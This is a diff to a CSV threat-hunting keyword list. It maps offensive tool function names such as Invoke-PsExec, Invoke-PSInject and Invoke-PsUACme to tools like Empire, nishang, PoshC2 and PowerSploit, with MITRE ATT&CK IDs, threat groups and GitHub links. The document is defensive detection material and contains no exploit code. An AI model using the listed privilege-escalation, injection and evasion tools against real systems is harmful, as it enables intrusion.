The vulnerability allows an unprivileged user to gain system-level privileges and is based on @ionescu007 PoC.","T1204 - T1208 - T1216 - T1055 - T1203","TA0001 - TA0007 - TA0004 - TA0005","N/A","N/A","Exploitation tools","https://github.com/BC-SECURITY/Invoke-PrintDemon","1","1","N/A","N/A","2","193","41","2020-10-17T17:04:24Z","2020-05-15T05:14:49Z" -"*Invoke-PrintNightmareCheck*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","2247","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z" -"*Invoke-Privesc*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2960","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" -"*Invoke-PrivescAudit*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. 
PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10978","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" +"*Invoke-PrintNightmareCheck*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","2254","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z" +"*Invoke-Privesc*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*Invoke-PrivescAudit*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. 
PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" "*Invoke-PrivescCheck*","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1009","830","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" -"*Invoke-PrivescCheck*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","2247","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z" +"*Invoke-PrivescCheck*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","2254","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z" "*Invoke-PrivescCheck.ps1*","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1009","830","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" "*invokeprocesshunter*","offensive_tool_keyword","cobaltstrike","PowerView menu for Cobalt Strike","T1548.002 - 
T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/tevora-threat/aggressor-powerview","1","1","N/A","10","10","60","17","2018-03-22T00:21:57Z","2018-03-22T00:21:13Z" "*Invoke-ProcessHunter*","offensive_tool_keyword","cobaltstrike","PowerView menu for Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - 
Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/tevora-threat/aggressor-powerview","1","1","N/A","10","10","60","17","2018-03-22T00:21:57Z","2018-03-22T00:21:13Z" -"*Invoke-ProcessHunter*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10978","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" +"*Invoke-ProcessHunter*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. 
PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" "*invoke-processhunter*","offensive_tool_keyword","pywerview","A partial Python rewriting of PowerSploit PowerView","T1069.002 - T1018 - T1087.001 - T1033 - T1069.001 - T1087.002 - T1016 - T1482","TA0007 - TA0009","N/A","N/A","Reconnaissance","https://github.com/the-useless-one/pywerview","1","1","N/A","N/A","8","738","102","2023-10-02T14:57:20Z","2016-07-06T13:25:09Z" "*Invoke-ProcessScan*","offensive_tool_keyword","Invoke-ProcessScan","This script uses a list from the Equation Group leak from the shadow brokers to provide context to executeables that are running on a system.","T1059.001 - T1016 - T1547.001","TA0002 - TA0003 - TA0008","N/A","N/A","Exploitation tools","https://github.com/vysecurity/Invoke-ProcessScan","1","1","N/A","N/A","1","42","22","2017-06-05T12:19:25Z","2017-06-03T18:36:30Z" "*InvokePS1.bat*","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1617","584","2023-10-03T22:06:35Z","2016-11-16T10:40:04Z" -"*Invoke-ps2exe*","offensive_tool_keyword","PS2EXE","Module to compile powershell scripts to executables","T1027.001 - T1564.003 - T1564.005","TA0002 - TA0006","N/A","N/A","Exploitation tools","https://github.com/MScholtes/PS2EXE","1","1","N/A","N/A","9","834","154","2023-09-26T15:03:14Z","2019-11-08T09:25:02Z" +"*Invoke-ps2exe*","offensive_tool_keyword","PS2EXE","Module to compile powershell scripts to executables","T1027.001 - T1564.003 - T1564.005","TA0002 - TA0006","N/A","N/A","Exploitation 
tools","https://github.com/MScholtes/PS2EXE","1","1","N/A","N/A","9","838","155","2023-09-26T15:03:14Z","2019-11-08T09:25:02Z" "*Invoke-PSAmsiScan*","offensive_tool_keyword","PSAmsi","PSAmsi is a tool for auditing and defeating AMSI signatures.","T1059.001 - T1562.001 - T1070.004","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/cobbr/PSAmsi","1","1","N/A","7","4","382","74","2018-04-22T20:56:33Z","2017-09-22T11:48:47Z" -"*Invoke-PsExec*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - 
","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-PsExec.ps1","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Invoke-PsExec*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-PsExec.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Invoke-PSexec.ps1*","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows 
computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1009","830","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" -"*Invoke-PsExec.ps1*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1095","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*invoke-psexecpayload*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a 
proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1601","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" -"*Invoke-PsGcat*","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","7849","2360","2023-09-05T07:54:08Z","2014-05-19T11:48:24Z" -"*Invoke-PsGcatAgent*","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","7849","2360","2023-09-05T07:54:08Z","2014-05-19T11:48:24Z" +"*Invoke-PsExec.ps1*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1095","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*invoke-psexecpayload*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" 
+"*Invoke-PsGcat*","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","7851","2361","2023-09-05T07:54:08Z","2014-05-19T11:48:24Z"
+"*Invoke-PsGcatAgent*","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","7851","2361","2023-09-05T07:54:08Z","2014-05-19T11:48:24Z"
 "*Invoke-PSImage*","offensive_tool_keyword","Invoke-PSImage","Encodes a PowerShell script in the pixels of a PNG file and generates a oneliner to executenInvoke-PSImage takes a PowerShell script and encodes the bytes of the script into the pixels of a PNG image. It generates a oneliner for executing either from a file of from the web.","T1027 - T1218 - T1216 - T1059","TA0002 - TA0008 - TA0007","N/A","N/A","Defense Evasion","https://github.com/peewpw/Invoke-PSImage","1","0","N/A","N/A","10","2075","401","2019-09-23T15:17:03Z","2017-12-17T18:41:44Z"
-"*Invoke-PSInject*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-PSInject.ps1","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*Invoke-PSInject.ps1*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1085","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*Invoke-PsUACme*","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","1","N/A","N/A","10","1356","243","2023-07-25T15:28:56Z","2021-08-02T15:35:57Z" -"*Invoke-PsUACme*","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. 
Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","7849","2360","2023-09-05T07:54:08Z","2014-05-19T11:48:24Z" -"*Invoke-PsUACme*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1601","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*Invoke-PSInject*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-PSInject.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Invoke-PSInject.ps1*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1085","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Invoke-PSInject.ps1*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*Invoke-PsUACme*","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","1","N/A","N/A","10","1357","243","2023-07-25T15:28:56Z","2021-08-02T15:35:57Z" 
